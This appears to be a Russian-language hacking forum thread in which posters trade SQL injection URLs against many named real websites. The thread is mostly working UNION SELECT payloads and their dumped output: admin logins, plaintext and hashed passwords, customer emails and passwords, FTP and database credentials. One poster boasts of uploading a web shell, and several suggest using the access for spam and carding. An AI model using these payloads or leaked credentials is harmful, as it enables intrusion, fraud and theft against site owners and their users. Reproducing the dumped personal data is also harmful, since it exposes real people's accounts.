Для Военный , молодой человек..никогда не сдавайся 1.http://www.usadba.ru/city/flat/5481/?-1+order+by+5-- version()- 5.0.67 user() - [email protected] database()-base_usadba слепая скуля...поможет нам СИПТ небезизвестный... посимвольный брут и вуаля с 1-16 стандартные таблички... а дальшe Getted String number 17:a_flats Getted String number 18:a_flats_arenda Getted String number 19:a_houses Getted String number 20:b_dormitory_arenda Getted String number 21:drm_s_highway Getted String number 22:l_house_area Getted String number 23:l_house_informal Getted String number 24:mmedia_city Getted String number 25:mmedia_drm Getted String number 26:mmedia_house ну я думаю понятно...ковыряй дальше сам.... удачи
Code: http://www.ypr.org.au/view_history.php?historyID=-6'+union+select+1,concat_ws(0x3a,USER(),DATABASE(),VERSION())/* [b]User:[/b] ypr@localhost [b]Database:[/b] ypr_org_au [b]Version:[/b] 4.1.20 http://www.nihonjujutsu.com/history.php?HistoryID=-7+union+select+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5,6/* [b]User:[/b] jujutsu@localhost [b]Database:[/b] jujutsu [b]Version:[/b] 5.0.32-Debian_7etch8-log http://www.onegi.com.tw/AboutOneGi/History_Content.php?HistoryID=-2+union+select+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20-- [b]User:[/b] onegi@localhost [b]Database:[/b] onegi [b]Version:[/b] 5.1.30-community http://www.xinanchem.com/historyxiangxi.php?historyId=-143+union+select+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5/* [b]User:[/b] root@localhost [b]Database:[/b] wynca2 [b]Version:[/b] 4.0.13-nt http://www.wynca.com/en/historyxiangxi.php?historyId=-110+union+select+1,concat_ws(0x3a,USER(),DATABASE(),VERSION()),3,4,5/* [b]User:[/b] root@localhost [b]Database:[/b] wynca2 [b]Version:[/b] 4.0.13-nt http://www.welltec.com.hk/news_see.php?thisid=-18+union+select+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5,6/* [b]User:[/b] root@localhost [b]Database:[/b] welltec_com_hk [b]Version:[/b] 5.0.26-community-nt http://www.salmonsupporters.com/detailsupporters.php?thisid=-32+union+select+1,concat_ws(0x3a,USER(),DATABASE(),VERSION()),3,4,5,6,7,8,9,10,11,12/* [b]User:[/b] [email protected] [b]Database:[/b] wssDBadmin [b]Version:[/b] 4.1.22-max-log http://www.lyrics.nl/showsong.php?songid=28151&artiestid=552&historyid=-12632+UNION+SELECT+1,concat_ws(0x3a,USER(),DATABASE(),VERSION()),3/* [b]User:[/b] filmenmu@localhost [b]Database:[/b] filmenmu [b]Version:[/b] 4.1.22 http://www.cosmos-ml.com/en/news_see.php?thisid=-1+UNION+SELECT+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5,6/* [b]User:[/b] root@localhost [b]Database:[/b] dg_cosmos [b]Version:[/b] 5.0.26-community-nt http://www.orcaschurch.org/Church_Notes.php?thisID=-28+union+select+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5%20-- [b]User:[/b] orcaschurch@localhost [b]Database:[/b] orcaschurch [b]Version:[/b] 5.0.58 http://www.gvchristian.com/videopopup.php?thisid=307+UNION+SELECT+1,concat_ws(0x3a,USER(),DATABASE(),VERSION()),3,4,5,6,7,8,9,10/* [b]User:[/b] root@localhost [b][b]Database:[/b]/b] fatguys_gvcc [b]Version:[/b] 5.0.45-Debian_1ubuntu3-log Это за вчера =). Мои скули. Крутите...
dofp_ab@localhost 4.1.22-standard dofp_db Database Version: 5.0.46-enterprise-gpl-log Database name: espin_dbo User name: [email protected] PageRank 7 Database Version: 5.0.32-Debian_7etch5-log Database name: poetry User name: [email protected] User:[email protected] Version:5.0.67-log Database:carbonrecords Ну и законченный магазинчик на вкусное -) http://www.europanet.com.br/site/index.php?cat_id=32&pag_id=-13673+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,version(),45,46,47,48,49,50,51,52,53,54,55-- Database Version: 5.0.18-log Database name: europanet User name: arima@localhost В общем там 38 Баз для всех пойдет и спам и аси кард итд... Getting Data from table loja_admin (11 Rows) from database eurobest_commerce Fields id_admin:usuario:senha:superadmin [4]:9:carmina:5268582b6eaed9fee8a2658b4f57707a:0 [5]:10:luiz:ebea0b104bf6f36f1eb2ddc931d666ea:1 [6]:11:internet:b7b791e873f143d5318310e59022175d:1 [7]:12:claudia:5268582b6eaed9fee8a2658b4f57707a:0 [8]:13:joana:0ffbdca648adb61d5535ff063e70cb3f:1 пароль amidala [9]:14:licia:63c193707ac085b2f8dd3115f546d6ed:0 Fields usuario:senha:admin_cat:admin_ftp [1]:crnarciso:317a77f27ecd0390:0: [2]:siqueira:0f1209ee38606424:0: [3]:joice:0e9df198295e5bc8:0: Пароль joice [4]:erick:350ef7027f408372:0: [5]:ivan:323ef54f34efa5cb:4: Пароль 120585 [6]:diogo:081c619177dbefa1:0: [7]:expedicao:6acea1340bfcbf5e:13: [8]:manu:5210fdc242391e30:575: [9]:livia:0ce5dd0f706534ab:600: Пароль fotografe [10]:humberto:6460f98b14d0ae2e:572:/animeinvaders/ [11]:rodolfo:4151a9df6c9924ac:617:/motomax/ [12]:mariofit:136940302c5235c7:617: Пароль ducati [13]:chris:2d2643c419314e1b:430:/sucesso/ [14]:gameblog:36dda20c5784bd81:825: [15]:luiz:36dda20c5784bd81:832:/gameblog/ [16]:nelson:36dda20c5784bd81:834:/gameblog/ [17]:leandro:36dda20c5784bd81:831:/gameblog/ [18]:julebas:36dda20c5784bd81:830:/gameblog/ [19]:fhazevedo:36dda20c5784bd81:828:/gameblog/ [20]:sombrates:36dda20c5784bd81:835:/gameblog/ [21]:trivella:36dda20c5784bd81:836:/gameblog/ [22]:humberto_gb:36dda20c5784bd81:829:/gameblog/ [23]:aida:449a67e9524397b5:2:/natureza/ Пароль plantas [24]:junior:63a09b66402d69ac:977:/xbox/ [25]:marco:36ad6fa45d632cd4:1:/ Пароль хэш MySQL:36ad6fa45d632cd4ortugal FTP 200.229.132.34:21 [26]:adriano:44d383005b181d39:35: Пароль marley [27]:luciane:26ae382f4d7de2e9:375:/sucesso/ Пароль lembrar [28]:humbertoblog:36dda20c5784bd81:829: [29]:flavia:36dda20c5784bd81:971:/gameblog/ [30]:gustavo:36dda20c5784bd81:970:/gameblog/ В общем самое важное было это залить шел.. Прошел в админку через тело marco:36ad6fa45d632cd4:1:/ Пароль хэш MySQL:36ad6fa45d632cd4ortugal FTP 200.229.132.34:21 Ну и спокойно залил. Далее раскопал конфиг там важная персона // Database username $phpAds_config['dbuser'] = 'arima'; // Database password $phpAds_config['dbpassword'] = 'spectroman21'; Доступ ко всем базам! save mode отключен -) Наслаждайтесь. PostgreSQL 7.2.7 on i686-pc-linux-gnu, compiled by GCC 2.96 http://www.elliottagency.co.uk/details.php?id=-258/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,version()--&r=/list.php http://www.elliottagency.co.uk/details.php?id=-258/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,TABLENAME/**/from/**/PG_TABLES+LIMIT+1,1--&r=/list.php itemimages CATEGORIES items pg_aggregate pg_am pg_amop pg_amproc pg_attrdef pg_attribute pg_xactlock pg_type pg_trigger pg_statistic pg_shadow pg_rewrite pg_relcheck pg_proc pg_operator pg_opclass pg_listener pg_largeobject pg_language pg_inherits pg_index pg_group pg_description pg_database pg_class Дальше не могу может кто сможет.... DATAMP - Directory of American Tool and Machinery Patents http://www.datamp.org/displayPatent.php?id=809809809809837107+union+select+1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--&pn=15 Database Version: 5.0.67-community-nt Database name: datamp User name: datamp_owner@localhost http://www.datamp.org/displayPatent.php?id=809809809809837107+UNION+SELECT+1,2,3,4,5,CONCAT((SELECT+CONCAT(steward_id,username,password,name,email)+FROM+datamp.data_stewards+LIMIT+19,1)),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- [1]:2:rbrendler:513eb98aea47a672a8f3536970b958fe:Ralph Brendler:[email protected] [2]:3:jjoslin:0869cf46fd51daaf1ee9ad0a2d2dba6a:Jeff Joslin:[email protected] [3]:4:blpenn:a16aa06b2f0474f3a361be2bfadb9070:Brian Pennington:[email protected] [4]:5:sreynolds:d41d8cd98f00b204e9800998ecf8427e:Steve Reynolds:[email protected] [5]:6:groberts:7db90444501f73dbb69c90ce7abdc329:Gary Roberts:[email protected] [6]:7:khays:eb416ed484bb765f198c8f43d95ccee8:Kirk Hays:[email protected] [7]:8:cswingle:d41d8cd98f00b204e9800998ecf8427e:Chris Swingley:[email protected] [8]:9:jmcvey:0869cf46fd51daaf1ee9ad0a2d2dba6a:Jeff McVey:[email protected] [9]:11:datchuck:61bc4419f39a648db27277c551367a5a:Jim Erdman:[email protected] [10]:13:cmatthews:1697d46fbd40f5fb68babd2776fd9d0a:Carl Matthews:[email protected] [11]:14:dmcconnell:c4ce0603e30080fa5f54e59a94d7921fon McConnell:[email protected] [12]:15:rallen:5c40e218bd15cc65899c3ab8905c4656:Russ Allen:[email protected] [13]:16:sschulz:d44c2e495958b2062ae1049b20b4aa35:Stan Schulz:[email protected] [14]:17:motllahsram:5abf97a52e1d08577d1294d9a46d0988:Tom Marshall:[email protected] [15]:18:joelr:ca3df0a222b067dbce8712a979bc9145:Joel Havens:[email protected] [16]:19:murness:c6dafa4f1768d773a4a877f663b59629:Mike Urness:[email protected] [17]:20:tpobrienjr:dc787b140dc4fc95ec5fd3ee4e361c6d:Tom O'Brien:[email protected] [18]:21:mwoodard:e15c0f3c29d61392357cbf71c9486e26:Mark Woodard:[email protected] [19]:23:mconley:7ac80e96ae9183e4f5811924f0606203:Mark Conley:[email protected] Понравился вот этот ящик -) [email protected]
интернет магазин аксессуаров и подарков табла с паролями и мылами Code: http://eluxus.com.ua/catalog/index.php?_a=view&_cat=-73 UNION SELECT 1,2,concat_ws(char(58),email,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 FROM useraccounts -- админка http://eluxus.com.ua/admin/ кто админ незнаю, ройте =) магазин топмобила Code: http://www.topmobila.com.ua/allg.php?id=-13 UNION SELECT 1,2,3,concat_ws(0x3a,USER(),DATABASE(),VERSION()),5,6,7,8,9,10,11,12,13,14 -- version::5.0.67-community user::shmel_admin@localhost database::shmel_mobiles Вывод всех таблиц Code: http://www.topmobila.com.ua/allg.php?id=-13 UNION SELECT 1,2,3,TABLE_NAME,5,6,7,8,9,10,11,12,13,14 FROM INFORMATION_SCHEMA.TABLES -- какой то Белорусский чат Code: http://www.irc.by/modules/articles/article.php?id=-16 UNION SELECT 1,2,3,4,5,6,concat_ws(0x3a,USER(),DATABASE(),VERSION()),8,9,10,11,12,13,14,15,16,17,18,19,20 -- version::4.1.25 User::ircby_xoops@localhost database::ircby_xoops интернет бутик для женщин Code: http://all-perfumes.com.ua/index.php?act=cat&id=-66 UNION SELECT concat_ws(0x3a,USER(),DATABASE(),VERSION()),2,3,4,5 -- version::4.1.12-standard-log user::drnova_dnj0Pw3@localhost database::drnova_apP4n1c7
Магазинчик -) Database Version: 5.0.67-community-log Database name: zoomacti_products User name: zoomacti_dare2li@localhost Fields emailassword [1][email protected] :ghijkl [2]:[email protected] :lackluster [3]:[email protected] :ghijkl [4]:[email protected] :mydol [5]:[email protected] :markizen [6]:[email protected] :d2ljunik [7]:[email protected] :buster1 [8]:[email protected] :edel9889 [9][email protected] :turbo [10]:[email protected] :bruin85 [11]:[email protected] :ila105bs [12]:[email protected] :marketing [13]:[email protected] :dissert [14]:[email protected] :bosscake [15]:[email protected] :qqqqqqqqqq [16]:[email protected] :ddddd [17]:[email protected] :aa [18]:[email protected] :987 [19]:[email protected] :ggggg Итд... И еще один магазинчик Database Version: 5.0.45 Database name: jfa User name: jfa@localhost
http://www.ambisousa.pt/php/inserir_comentario.php?id=-1+union+select+1,2,3,4,login,passwd+from+users-- http://www.ambisousa.pt/admin/ login:ambisousa pass:sousinha Куяк!!!
Code: http://sim-cat.com/cats.php?sex=-0+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*&lang=eng 4.0.27-max-log Code: http://www.stylecat.ru/cats.php?sex=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,version(),21,22,23,24,25,26,27,28,29--&breed=kbo&lang=rus 5.0.51a-log 2
The Winston Churchill Memorial Trust Ниже представленный запрос такого вида, из-за отсутствия иного выхода по причине следующей ошибки: Fatal error: Database error #1267: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION' возникшая, к примеру, при функциях user(), database(),version(). А поля таблиц проходят без проблем. database():churchilltrust user():winston@localhost Code: http://www.churchilltrust.com.au/news.php?id=-2+union+select+1,password,3,username,5,6+from+users/* username:admin password:4dm1n
магазин подарков Code: http://www.chudesa.com.ua/?page=prod_detail&prod_id=-456%20UNION%20SELECT%201,2,3,concat_ws(0x3a,USER(),DATABASE(),VERSION()),5,6,7,8,9,10,11,12,13,14,15%20%20-- version::4.1.22 user::u_chudesa@localhost database::chudesa в табле users были следующие персоны: login:test login:vika passwors:123 passwordjhbr Code: http://www.chudesa.com.ua/?page=prod_detail&prod_id=-456%20UNION%20SELECT%201,2,login,pass,5,6,7,8,9,10,11,12,13,14,15%20from%20users%20limit%200,1%20-- ещё один магазин подарков Code: http://www.podarunky.kiev.ua/showpage.php?id=9999999%20UNION%20SELECT%201,2,3,c oncat_ws(0x3a,USER(),DATABASE(),VERSION()),5,6,7%2 0%20-- version::4.1.22-log user::sitemaker@localhost database::giftBase Магазин медикаментов MEDIMAG Code: http://www.medimag.com.ua/index.php?view=products&razdel=4&sub=38&id=-278%20UNION%20SELECT%201,2,3,4,5,6,7,8,concat_ws(0x3a,USER(),DATABASE(),VERSION()),10,11,12,13,14,15,16,17,18,19,20%20-- version::4.1.22 user::u_medimag_ap@localhost database::medimag_apteka табла с паролями Code: http://www.medimag.com.ua/index.php?view=products&razdel=4&sub=38&id=-278%20UNION%20SELECT%201,2,3,4,5,6,7,login,password,10,11,12,13,14,15,16,17,18,19,20%20from%20users%20-- login::admin password::shutnick Вход в админку через сайт, можно реально оформить заказ и подтвердить его. Книжный магазин Code: http://market.factor.ua/books.php?book_id=-811%20UNION%20SELECT%201,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20-- version::4.1.20 user::market@localhost database::market
Unitech user:[email protected] database:uniroot version:4.1.22-max-log http://unitech.com.az/admin/ username:uni password:777
http://www.uztest.ru на сайте имеется база данных на более чем 7,5 тыс учителей=)) db - uztest3_temp version - 5.0.51a user - uztest3_temp@localhost админка - login: oldteacher pass:591121 админка форума - login:admin pass:goldfire757 P.s все пароли выводяться в не зашифрованном виде=)))
http://www.valitsus.ee/index.php?rep_id=294943&tpl=1007%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*&external=&search=&aasta= Таблички: admin,config,tbl,version http://www.valitsus.ee/brf/admin Доступ закрыт по айпи,если не ошибаюсь в очередной раз =______________=
Сайт турнира по программированию=) http://www.icl.ru админка - pass:wordplay login: pupucya пароли админов зашифрованы в MYSQL-4.x-Hash вывод информации с пользователями: пароли пользователей в незашифрованном виде ;-) бд- turnir; версия бд - 5.0.15-nt юзер - [email protected]
Code: http://www.bioticregulation.ru/foto/show.php?ng=5&lang=en&nc=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13-- http://www.bioticregulation.ru/foto/show.php?ng=5&lang=en&nc=-1+union+select+1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13+from+information_schema.tables+where+table_schema=0x7070656c626132325f666f746f-- Code: http://www.inta.gatech.edu/faculty-staff/listing.php?uID=-20+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19-- Code: http://dms.dartmouth.edu/faculty/facultydb/view.php?uid=-139+union+select+1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38-- Code: таблицы: biblio,facultydb,profile,users колонки(users): uid,name,add_perm,edit_perm,delete_perm,superuser колонки(profile): id,facultydb_id,cv_filename,dv,bio_filename,bio колонки(facultydb): uid,Personal_ID,status,Name_DND,Name_First,Name_Middle,Name_Last,Name_Prefix,Name_Suffix,Position_Title,Birth_Date,Department,Degree,Education,Interests,Programs,Courses,Grant_Support,Core_Facilities,URL,Telephone_Number,Facsimile_Number,Email_Address,Office,Assistant,Asst_Telephone,Asst_Email,Address1,Address2,Address3,City,State,Zip_Code колонки(biblio): Title,Authors,Source,PMID,Medline_AN,id,uid
Code: http://market-doors.ru/show_cat2.php?grid=-5+union+select+concat_ws(0x3a,username,password)+FROM+admin [email protected] 5.0.67-log u55818 admin:588eb5181b3ba704 http://market-doors.ru/admin.php Code: http://www.kubanjob.ru/vacanc.php?id=-15948+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9,10,11,12,13,14,15,16,17,18,19,20 Uwww2727S@localhost 4.1.21-log udb2727 Code: http://arendyi.ru/detail.php?de=-2362+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9,10,11 [email protected] 5.0.67-log u8766_arendyi http://www.arendyi.ru/login.php Ольга:11111, Ольга:777, Ольга:222222, Ольга:jkmuf, Рая:2332 Code: http://allookna.ru/?page=-19+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11 [email protected] 5.0.67-log u52548 admin:fkkjadmin http://allookna.ru/admin/ Code: http://shark63.ru/index.php?cat=-3+union+select+concat_ws(0x3a,user(),version(),database()),2--&subcat=0&det=0 [email protected] 5.0.67-log u57848 - logins shark:dZral - logins_base shark:dZral,avtorental:sc56Rnt,hertz:hop42gDr,shark:ro6tSf35,avtorental:HQr57tu,hertz:htf47gH - logins_buh_flagman shark:dZral,shark:sdf7A - logins_buh_ssp shark:dZral,shark:sdf7A http://shark63.ru/buh_shark http://shark63.ru/buh_flagman http://shark63.ru/buh_ssp http://shark63.ru/base http://shark63.ru/client Code: http://www.tetevent.ru/cat.php?bid=-37+union+select+1,concat_ws(0x3a,user(),version(),database())-- [email protected] 5.0.67-log u64338 Code: http://www.tetevent.ru/cat.php?bid=-37+union+select+1,concat_ws(0x3a,name,pass)+FROM+users-- admin:1 http://www.tetevent.ru/admin/